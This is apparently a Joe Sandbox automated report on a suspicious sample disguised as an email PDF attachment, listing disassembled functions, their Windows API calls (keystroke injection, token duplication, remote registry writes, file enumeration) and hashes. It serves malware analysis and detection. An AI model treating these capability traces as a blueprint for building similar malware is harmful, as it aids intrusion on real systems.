                                                                                                          Function 00770791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007707B0
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongNamePath_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2514874351-0
                                                                                                          • Opcode ID: ce86785484ad8685f4765e6e07210e4c47cd32b5ebf8bbf8dcb38b72d1ec2ffa
                                                                                                          • Instruction ID: bd0685ab68bc54c6a2181e59f942642927dd0edfdb947eab9be1ca56fc88ab00
                                                                                                          • Opcode Fuzzy Hash: ce86785484ad8685f4765e6e07210e4c47cd32b5ebf8bbf8dcb38b72d1ec2ffa
                                                                                                          • Instruction Fuzzy Hash: F9E0CD7694512857C720E6589C09FEA77EDDF887A1F0441F6FC0CD7244D964AC8086D0
                                                                                                          Function 007B8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2638373210-0
                                                                                                          • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                          • Instruction ID: b5e5670465abc6e7cdb7d5923412b979a6482bcf21c3069825df118d3413a16b
                                                                                                          • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                          • Instruction Fuzzy Hash: E8E092B0104B049BDB388A24D840BE373E5AB05304F04091DF2AA83241EBA7B841C759
                                                                                                          Function 0077525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wfsopen
                                                                                                          • String ID:
                                                                                                          • API String ID: 197181222-0
                                                                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                          • Instruction ID: 65edaa9bf994371f2ddcc28fbc9e3a5ee9525130c689b49fb50f7337763d79af
                                                                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                          • Instruction Fuzzy Hash: 5AB092B644020CB7CE012A82EC02A493B19AB417A4F408020FB0C18162A6B7A6649A89
                                                                                                          Function 00E840F0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 00E84101
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3472027048-0
                                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                          • Instruction ID: 9406944de1f363c4379282a874923a21ec54b2661190e45127a3ad20e51e665f
                                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                          • Instruction Fuzzy Hash: C0E0E67494110EDFDB00EFF4D54D69E7FB4EF14301F100161FD05E2281D6309D508A62

                                                                                                          Non-executed Functions

                                                                                                          Function 007DCABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 007DCB37
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCB95
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007DCBD6
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DCC00
                                                                                                          • SendMessageW.USER32 ref: 007DCC29
                                                                                                          • _wcsncpy.LIBCMT ref: 007DCC95
                                                                                                          • GetKeyState.USER32(00000011), ref: 007DCCB6
                                                                                                          • GetKeyState.USER32(00000009), ref: 007DCCC3
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DCCD9
                                                                                                          • GetKeyState.USER32(00000010), ref: 007DCCE3
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DCD0C
                                                                                                          • SendMessageW.USER32 ref: 007DCD33
                                                                                                          • SendMessageW.USER32(?,00001030,?,007DB348), ref: 007DCE37
                                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 007DCE4D
                                                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007DCE60
                                                                                                          • SetCapture.USER32(?), ref: 007DCE69
                                                                                                          • ClientToScreen.USER32(?,?), ref: 007DCECE
                                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007DCEDB
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007DCEF5
                                                                                                          • ReleaseCapture.USER32 ref: 007DCF00
                                                                                                          • GetCursorPos.USER32(?), ref: 007DCF3A
                                                                                                          • ScreenToClient.USER32(?,?), ref: 007DCF47
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DCFA3
                                                                                                          • SendMessageW.USER32 ref: 007DCFD1
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD00E
                                                                                                          • SendMessageW.USER32 ref: 007DD03D
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007DD05E
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007DD06D
                                                                                                          • GetCursorPos.USER32(?), ref: 007DD08D
                                                                                                          • ScreenToClient.USER32(?,?), ref: 007DD09A
                                                                                                          • GetParent.USER32(?), ref: 007DD0BA
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DD123
                                                                                                          • SendMessageW.USER32 ref: 007DD154
                                                                                                          • ClientToScreen.USER32(?,?), ref: 007DD1B2
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007DD1E2
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DD20C
                                                                                                          • SendMessageW.USER32 ref: 007DD22F
                                                                                                          • ClientToScreen.USER32(?,?), ref: 007DD281
                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007DD2B5
                                                                                                            • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007DD351
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                          • String ID: @GUI_DRAGID$F
                                                                                                          • API String ID: 3977979337-4164748364
                                                                                                          • Opcode ID: 387a1df14d058022d22b70ab17117d7ccf9aaa7d8ab1426ac2f4464bebb2e749
                                                                                                          • Instruction ID: 4f1f6b42ba6ff11bafa6826240e6b276d19c14db795d538319c5d46127b336b0
                                                                                                          • Opcode Fuzzy Hash: 387a1df14d058022d22b70ab17117d7ccf9aaa7d8ab1426ac2f4464bebb2e749
                                                                                                          • Instruction Fuzzy Hash: 6542BD74204282EFD722CF28C849AAABBF5FF49310F14452AF696873A1C739E854DB51
                                                                                                          Function 00766F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_memset
                                                                                                          • String ID: 3cv$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_v
                                                                                                          • API String ID: 1357608183-1043445878
                                                                                                          • Opcode ID: 783ee9a90668f02f514228bfda47b1b67fd6a0e33675dfd1002f47b9db32f063
                                                                                                          • Instruction ID: 84a1a099274d3a2526d7da18cb63f2eb7dcae0d15205cee805dd492aa273f158
                                                                                                          • Opcode Fuzzy Hash: 783ee9a90668f02f514228bfda47b1b67fd6a0e33675dfd1002f47b9db32f063
                                                                                                          • Instruction Fuzzy Hash: CD93A571E04219DFDB28CF58C8817ADB7B1FF89314F24826AE955AB381E7789D81CB50
                                                                                                          Function 007548D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32(00000000,?), ref: 007548DF
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0078D665
                                                                                                          • IsIconic.USER32(?), ref: 0078D66E
                                                                                                          • ShowWindow.USER32(?,00000009), ref: 0078D67B
                                                                                                          • SetForegroundWindow.USER32(?), ref: 0078D685
                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078D69B
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0078D6A2
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0078D6AE
                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078D6BF
                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078D6C7
                                                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0078D6CF
                                                                                                          • SetForegroundWindow.USER32(?), ref: 0078D6D2
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078D6E7
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078D6F2
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078D6FC
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078D701
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078D70A
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078D70F
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078D719
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078D71E
                                                                                                          • SetForegroundWindow.USER32(?), ref: 0078D721
                                                                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0078D748
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 4125248594-2988720461
                                                                                                          • Opcode ID: 078e7f84d81ff13e2c55853e1dfe6650f103ea02b8f621099c4fd87940719a12
                                                                                                          • Instruction ID: 78561fd5486c9c2d67b0b8204f6cf7b1a81895b2349a219c1227d34c7c5fa19b
                                                                                                          • Opcode Fuzzy Hash: 078e7f84d81ff13e2c55853e1dfe6650f103ea02b8f621099c4fd87940719a12
                                                                                                          • Instruction Fuzzy Hash: ED319571A81318BAEB202B619C49F7F3F7CEB44B50F148066FA06EA1D1C6B45D10ABA4
                                                                                                          Function 007A8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A882B
                                                                                                            • Part of subcall function 007A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8858
                                                                                                            • Part of subcall function 007A87E1: GetLastError.KERNEL32 ref: 007A8865
                                                                                                          • _memset.LIBCMT ref: 007A8353
                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007A83A5
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007A83B6
                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007A83CD
                                                                                                          • GetProcessWindowStation.USER32 ref: 007A83E6
                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 007A83F0
                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007A840A
                                                                                                            • Part of subcall function 007A81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8309), ref: 007A81E0
                                                                                                            • Part of subcall function 007A81CB: CloseHandle.KERNEL32(?,?,007A8309), ref: 007A81F2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                          • String ID: $default$winsta0
                                                                                                          • API String ID: 2063423040-1027155976
                                                                                                          • Opcode ID: f393fc8cdf7f1f293e8ef0b7e2adfe7836fbc9a69e877ae97e626e80cac743d2
                                                                                                          • Instruction ID: 313333286b3c4f3143c21f38afeb200167f327aed3f61a6d5b98f9505ee8d987
                                                                                                          • Opcode Fuzzy Hash: f393fc8cdf7f1f293e8ef0b7e2adfe7836fbc9a69e877ae97e626e80cac743d2
                                                                                                          • Instruction Fuzzy Hash: 51818C71D01209AFDF519FA4CC49AEE7BB9FF45304F18826AFC11A2261DB398E14DB21
                                                                                                          Function 007BC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 007BC78D
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BC7E1
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BC806
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BC81D
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 007BC844
                                                                                                          • __swprintf.LIBCMT ref: 007BC890
                                                                                                          • __swprintf.LIBCMT ref: 007BC8D3
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • __swprintf.LIBCMT ref: 007BC927
                                                                                                            • Part of subcall function 00773698: __woutput_l.LIBCMT ref: 007736F1
                                                                                                          • __swprintf.LIBCMT ref: 007BC975
                                                                                                            • Part of subcall function 00773698: __flsbuf.LIBCMT ref: 00773713
                                                                                                            • Part of subcall function 00773698: __flsbuf.LIBCMT ref: 0077372B
                                                                                                          • __swprintf.LIBCMT ref: 007BC9C4
                                                                                                          • __swprintf.LIBCMT ref: 007BCA13
                                                                                                          • __swprintf.LIBCMT ref: 007BCA62
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                          • API String ID: 3953360268-2428617273
                                                                                                          • Opcode ID: e39a44242632b4b0a1e085fe8b004311e21681bbfe925129714f40b062027f7d
                                                                                                          • Instruction ID: 7f0fde2fe41147c16dd75150b54ff90eb3404a1567d786c971425d4a525109aa
                                                                                                          • Opcode Fuzzy Hash: e39a44242632b4b0a1e085fe8b004311e21681bbfe925129714f40b062027f7d
                                                                                                          • Instruction Fuzzy Hash: D3A10CB1504304EBD745EB94C889DAFB7ECBF94701F40491DF995C6191EB78EA08CB62
                                                                                                          Function 007BEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007BEFB6
                                                                                                          • _wcscmp.LIBCMT ref: 007BEFCB
                                                                                                          • _wcscmp.LIBCMT ref: 007BEFE2
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 007BEFF4
                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 007BF00E
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 007BF026
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF031
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF04D
                                                                                                          • _wcscmp.LIBCMT ref: 007BF074
                                                                                                          • _wcscmp.LIBCMT ref: 007BF08B
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF09D
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00808920), ref: 007BF0BB
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF0C5
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF0D2
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF0E4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1803514871-438819550
                                                                                                          • Opcode ID: 8d4a19110bd99dda2f97e841f2b2327d4c2fee7bd16bc22e278350880dc4e77d
                                                                                                          • Instruction ID: 4d3388357625cc4eaad6b5c4281427b374cb8dc0380c319867ede99a3a31e2c3
                                                                                                          • Opcode Fuzzy Hash: 8d4a19110bd99dda2f97e841f2b2327d4c2fee7bd16bc22e278350880dc4e77d
                                                                                                          • Instruction Fuzzy Hash: 1831F632501208AADF14EFB4DC48BEE77BCAF48760F148176F845E21A1DB78DA80CA65
                                                                                                          Function 007D0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0953
                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,007DF910,00000000,?,00000000,?,?), ref: 007D09C1
                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007D0A09
                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007D0A92
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 007D0DB2
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007D0DBF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                          • API String ID: 536824911-966354055
                                                                                                          • Opcode ID: 2757e7f362c2d1907010ee86a9862726d4ede0edbfc3b8eaf85df47e41a5da7b
                                                                                                          • Instruction ID: ff3e3f91fe0daabd58ad643ff994b50a6f5900cde51aad56d4f2328a51b042e1
                                                                                                          • Opcode Fuzzy Hash: 2757e7f362c2d1907010ee86a9862726d4ede0edbfc3b8eaf85df47e41a5da7b
                                                                                                          • Instruction Fuzzy Hash: 55023675600601DFCB14EF24C859A6AB7E5EF89310F048459F99A9B3A2DB78FD05CB81
                                                                                                          Function 007BF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007BF113
                                                                                                          • _wcscmp.LIBCMT ref: 007BF128
                                                                                                          • _wcscmp.LIBCMT ref: 007BF13F
                                                                                                            • Part of subcall function 007B4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007B43A0
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 007BF16E
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF179
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF195
                                                                                                          • _wcscmp.LIBCMT ref: 007BF1BC
                                                                                                          • _wcscmp.LIBCMT ref: 007BF1D3
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF1E5
                                                                                                          • SetCurrentDirectoryW.KERNEL32(00808920), ref: 007BF203
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF20D
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF21A
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BF22C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
